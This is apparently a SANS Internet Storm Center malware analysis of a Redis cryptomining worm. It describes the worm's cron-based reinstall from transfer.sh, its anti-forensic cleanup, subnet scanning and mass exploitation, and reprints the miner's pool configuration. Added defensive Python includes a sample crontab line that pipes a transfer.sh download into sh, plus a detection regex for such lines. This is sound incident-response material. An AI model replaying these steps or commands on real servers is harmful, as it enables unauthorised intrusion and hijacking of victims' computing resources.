Anatomy of a Redis mining worm, (Fri, May 18th)

Publicly accessible Redis servers have been exploited for a while now, but we stumbled upon an interesting mining worm in one of our honeytraps. Within the past 5 days we’ve seen 173 unique IP addresses infected with this worm; 88% of the infected servers are located in China, 4% in the US and 4% in Hong Kong.

The worm searches for open Redis servers (port 6379), configures cron to download itself every few minutes (using a file upload service), starts mining and looks for new targets. It sends the payload *1\r\n$4\r\nINFO\r\n (the INFO command in Redis protocol encoding) and checks the response for os:Linux, to prevent replication to other operating systems.
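To make the probe above concrete, here is an added Python example (not code from the diary, and not the worm's code) that encodes a command in the Redis protocol (RESP), which is why INFO goes on the wire as *1\r\n$4\r\nINFO\r\n, parses the bulk-string reply, and classifies what an unauthenticated INFO from outside gets back. The sample replies are constructed, not captured from the honeytrap; the version and kernel strings are made up. The useful defender check is the second case: once requirepass is set, the same probe gets a NOAUTH error instead of an os:Linux line.

```python
from typing import Dict, Optional


def resp_encode(*args: str) -> bytes:
    """Encode a command as a RESP array of bulk strings; INFO becomes *1\\r\\n$4\\r\\nINFO\\r\\n."""
    parts = [b"*%d\r\n" % len(args)]
    for arg in args:
        raw = arg.encode()
        parts.append(b"$%d\r\n%s\r\n" % (len(raw), raw))
    return b"".join(parts)


def resp_bulk(payload: bytes) -> bytes:
    """Wrap a payload as a RESP bulk string; used here only to build sample replies."""
    return b"$%d\r\n%s\r\n" % (len(payload), payload)


def resp_parse_bulk(reply: bytes) -> Optional[bytes]:
    """Return the payload of a bulk-string reply, or None for a RESP error or nil reply."""
    if reply.startswith(b"-"):          # error reply, e.g. -NOAUTH Authentication required.
        return None
    if not reply.startswith(b"$"):
        raise ValueError("not a bulk string reply")
    head, _, rest = reply.partition(b"\r\n")
    length = int(head[1:])
    if length < 0:                      # $-1 is the nil bulk string
        return None
    if len(rest) < length + 2:
        raise ValueError("truncated reply")
    return rest[:length]


def parse_info(payload: bytes) -> Dict[str, str]:
    """Turn the key:value lines of an INFO payload into a dict, skipping '# Section' headers."""
    info = {}
    for line in payload.decode(errors="replace").splitlines():
        if not line or line.startswith("#"):
            continue
        key, _, value = line.partition(":")
        info[key] = value
    return info


def probe_outcome(reply: bytes) -> str:
    """Classify what an unauthenticated INFO from outside gets back.

    'linux-open' is the case the worm goes on to exploit, 'no-info' is what a server
    with requirepass set returns (an error reply), anything else is 'other-os'.
    """
    payload = resp_parse_bulk(reply)
    if payload is None:
        return "no-info"
    os_field = parse_info(payload).get("os", "")
    return "linux-open" if os_field.startswith("Linux") else "other-os"


# Constructed sample replies (not captured from the honeytrap).
OPEN_LINUX_REPLY = resp_bulk(
    b"# Server\r\nredis_version:4.0.9\r\nos:Linux 4.15.0-20-generic x86_64\r\ntcp_port:6379\r\n"
)
NOAUTH_REPLY = b"-NOAUTH Authentication required.\r\n"

if __name__ == "__main__":
    print(resp_encode("INFO"))
    print(probe_outcome(OPEN_LINUX_REPLY), probe_outcome(NOAUTH_REPLY))
```

Feeding the function a reply recorded from a real socket works the same way; the parser deliberately stops at the first bulk string, so pipelined replies would need to be split first.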

When the cron job executes, the worm disables security controls: it closes the publicly open Redis port using iptables, disables SELinux and disables caching. Any running miners are killed and the cryptonight miner is started. The worm takes advantage of public file hosting, in this case transfer.sh, to replicate itself. Transfer.sh removes files after 14 days, which is presumably why a fresh copy is uploaded on each replication.

The miner that is downloaded (see the VirusTotal link below) uses the cryptonight proof-of-work algorithm, which is CPU-only and therefore efficient to run on exploited servers. When reversing the binary we noticed the following configuration:

    {
        "algo": "cryptonight",
        "av": 0,
        "background": true,
        "colors": false,
        "cpu-affinity": null,
        "cpu-priority": null,
        "donate-level": 5,
        "log-file": null,
        "max-cpu-usage": 50,
        "print-time": 60,
        "retries": 5,
        "retry-pause": 5,
        "safe": true,
        "threads": null,
        "pools": [
            {
                "url": "jb.chakpools.com:443",
                "user": "N9emUy6baNTbNwFzZmjzzg7bntSr6TFYRiJy6oXuosHhQZamMFZXzpYENJcdXvC5cwN8oqCrXJ4YYgWRgBNXZk6a33wT7os",
                "pass": "x",
                "keepalive": true,
                "nicehash": true
            }
        ],
        "api": {
            "port": 0,
            "access-token": null,
            "worker-id": null
        }
    }

For a bash worm it is unusually careful to remove all kinds of residue: it sets a bash trap to remove everything on script exit, removes logs, and syncs and drops caches.

Script breakdown:

  • delete stale (older than 60 minutes) mutex files
  • create a .mxff0 file that functions as a mutex; if it already exists the script quits. This prevents running multiple instances of the same script.
  • configure a trap handler that removes all scripts when the script exits
  • disable SELinux
  • remove the current crontab (which contained previous installs of the worm)
  • add the Google nameserver (8.8.8.8) to /etc/resolv.conf
  • empty temp folders
  • sync and then drop all Linux caches
  • raise the security limits for open files and processes
  • disable access from the outside (iptables) and enable loopback listening
  • kill competing miners, other processes and scanning scripts
  • clean bash history, logs, mail spool and tmp
  • check for CentOS, Red Hat, Fedora or Ubuntu, Debian, Mint or Knoppix to decide between yum and apt
  • install the redis client tool and other tools
  • download and build pnscan
  • download the cryptominer binary and upload it again to transfer.sh (see the VirusTotal link below)
  • rename the miner to .gpg and execute it
  • modify its own script and upload the new copy to prolong its existence
  • prepare a .dat Redis script to exploit other servers
  • scan complete subnets for other open Redis servers, in random order within the ranges 1.0.0.0/16 to 224.255.0.0/16
  • pnscan sends the payload and reads os:Linux, output to .r.$x.$y.o (contains all open Redis servers)
  • filter out only Linux servers, output to .r.$x.$y.l
  • mass exploit using redis-cli
  • repeat the previous steps for the next subnet
  • remove all evidence
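The breakdown above doubles as a triage checklist. The following Python is an added example (not part of the diary and not the worm's code) that turns the published IOCs into host checks a responder can run offline: crontab lines that fetch from transfer.sh or pipe a download straight into a shell, the .gpg/.dat/.mxff0 filenames and the miner's sha256 in a directory tree, and an xmrig-style config whose pool points at jb.chakpools.com or its IP. The sample crontab and config are constructed, the wallet value is a placeholder, and the cron regex is a heuristic, so treat its hits as leads rather than verdicts.

```python
import hashlib
import json
import re
from pathlib import Path

# IOCs below are the ones published in the diary; everything else is constructed.
MINER_SHA256 = "9756e66c168ec963c58b3d0ca5483927c14a64a99ba718fa9488a52d4d207ed6"
POOL_HOSTS = {"jb.chakpools.com", "159.203.182.176"}
IOC_FILENAMES = {".gpg", ".dat", ".mxff0"}

# Heuristic: a cron line that pulls from transfer.sh, or pipes curl/wget output into a
# shell, matches the self-reinstall job described in the breakdown.
CRON_PATTERN = re.compile(r"transfer\.sh|(curl|wget)[^\n]*\|\s*(ba)?sh\b")


def check_crontab(text: str) -> list:
    """Return non-comment crontab lines that look like the worm's periodic re-download job."""
    return [
        line for line in text.splitlines()
        if line.strip() and not line.lstrip().startswith("#") and CRON_PATTERN.search(line)
    ]


def sha256_file(path: Path) -> str:
    """Stream a file through sha256 so large binaries do not have to fit in memory."""
    digest = hashlib.sha256()
    with path.open("rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 16), b""):
            digest.update(chunk)
    return digest.hexdigest()


def scan_tree(root) -> list:
    """Walk a directory (e.g. /tmp or a home dir) and report IOC filenames and the miner hash."""
    findings = []
    for path in sorted(Path(root).rglob("*")):
        if not path.is_file():
            continue
        if path.name in IOC_FILENAMES:
            findings.append(("ioc-filename", str(path)))
        try:
            if sha256_file(path) == MINER_SHA256:
                findings.append(("miner-hash", str(path)))
        except (PermissionError, OSError):
            continue                    # unreadable file: skip rather than abort the sweep
    return findings


def check_miner_config(text: str) -> list:
    """Parse an xmrig-style JSON config and return pool URLs that point at the diary's pool."""
    cfg = json.loads(text)
    hits = []
    for pool in cfg.get("pools", []):
        url = pool.get("url", "")
        host = url.split("://")[-1].rsplit(":", 1)[0]   # strip scheme and port
        if host in POOL_HOSTS:
            hits.append(url)
    return hits


# Constructed samples, not recovered from an infected host.
SAMPLE_CRONTAB = """\
# constructed crontab for illustration
0 2 * * * /usr/bin/updatedb
*/5 * * * * curl -fsSL https://transfer.sh/PLACEHOLDER/x | sh
"""

SAMPLE_CONFIG = json.dumps({
    "algo": "cryptonight",
    "background": True,
    "max-cpu-usage": 50,
    "pools": [{"url": "jb.chakpools.com:443", "user": "WALLET_PLACEHOLDER",
               "pass": "x", "nicehash": True}],
})

if __name__ == "__main__":
    print("cron hits:", check_crontab(SAMPLE_CRONTAB))
    print("pool hits:", check_miner_config(SAMPLE_CONFIG))
    print("tmp findings:", scan_tree("/tmp"))
```

Run scan_tree against /tmp, /var/tmp and the home directories of service accounts; because the worm renames the miner to .gpg, a hash match is the stronger signal and the filename match is the cheaper one.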

If you’re interested, you can find the source in the gist linked below.

IOCs

  • sha256: 9756e66c168ec963c58b3d0ca5483927c14a64a99ba718fa9488a52d4d207ed6
  • ssdeep: 12288:s/d8Tu4RnpO4rFnRwIzUDAwtkgWRFV0+JvZNFIZcLA43LLXl4Aq1A:kH41I4rVRDUDAwGL/bIZcLx3x
  • jb.chakpools.com (159.203.182.176)
  • filenames: .gpg, .dat, .mxff0

Links

  • https://www.virustotal.com/#/file/9756e66c168ec963c58b3d0ca5483927c14a64a99ba718fa9488a52d4d207ed6/detection
  • https://gist.github.com/nl5887/f6f8ed67ae95244482b54aa46b530bba

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.